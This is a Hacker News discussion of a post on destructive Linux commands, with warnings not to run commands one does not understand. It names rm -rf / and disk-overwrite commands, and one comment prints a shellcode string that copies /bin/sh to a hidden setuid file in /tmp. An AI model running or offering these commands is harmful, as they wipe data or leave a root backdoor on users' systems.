
The Deadly Linux Commands - NARKOZ
https://plus.google.com/111560558537332305125/posts/d64bp6rkZMC
======
simias
And we could come up with a million other different ways to wreck a un*x
system. The only rule is not to run a command you don't understand, especially
if it comes from an untrusted source.

Also, most of those commands won't hurt much if they're not run as root
(except the forkbomb and the recursive chmod/rm, and rm won't let you do that
by default). If you run untrusted commands as root you deserve what happens to
you.

~~~
hobin
^That.

A simple rule of thumb is: don't run any commands you don't understand before
looking up a few descriptions of what it means (or use man pages).

Number 2, for example, is just a bunch of shellcode, and unless you do
penetration testing for a living, you probably can't directly see what it'd
do. This goes not only for this particular script, but for mostly every piece
of shellcode that can be written. (And make no mistake, there are a frapillion
ways in which a piece of shellcode can utterly destroy your computer.) Ergo:
don't run them if you don't get them.

------
philh

        char esp[] _attribute_ ((section(".text"))) /* e.s.p release */
        = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
        "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
        "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
        "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
        "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
        "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
        "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
        "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
    

Can anyone explain this one? I would have guessed that it's causing an exec
(or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...".
That's malicious if run as root ('4' in 4755 is setuid, so it basically hides
a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post
is wrong, but I'd still like to know how this works.

What I've gathered:

1\. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm
getting the argv from. The exec is mostly a guess, because I can't think what
else it would be doing. The previous hex bytes are non-text, possibly
precompiled executable code.

2\. The '_attribute_ ((section(".text")))' is a gcc extension that causes this
string not to be stored where it usually would be in the binary. I believe the
.data section would be more normal? But I've never been very clear on what the
different sections are for.

~~~
hkolk
The post is wrong. This does nothing since it is a line of C code, so not
actually executable.

It comes from this trick-email:
<http://seclists.org/fulldisclosure/2007/Aug/71>

There are some details on these commands (and looks like the source article)
here: <http://ubuntuforums.org/announcement.php?f=48> (3rd post)

------
morsch
FWIW, and _please_ do not rely on this or test it, but _rm -rf /_ should not
do anything on most Linux installs since _\--preserve-root_ is the default.

------
nzmsv
Not my proudest moment: once I set up a chroot with several directories using
"mount --bind". Then I didn't need it anymore, so I promptly issued an "rm -rf
*".

------
alpb
Pardon me but I'm impressed as a noob Linux user. 12 commands listed. 6 of
them are rm -rf jokes, 6 of them are /dev/sda jokes. I'd expect different cool
stuff.

------
16s
Most of those must be executed as root to cause harm.

~~~
VMG
which doesn't mean that running command as a user is less dangerous - in fact
I think that _rm -rf ~_ is more damaging to a normal user than _rm -rf /_.

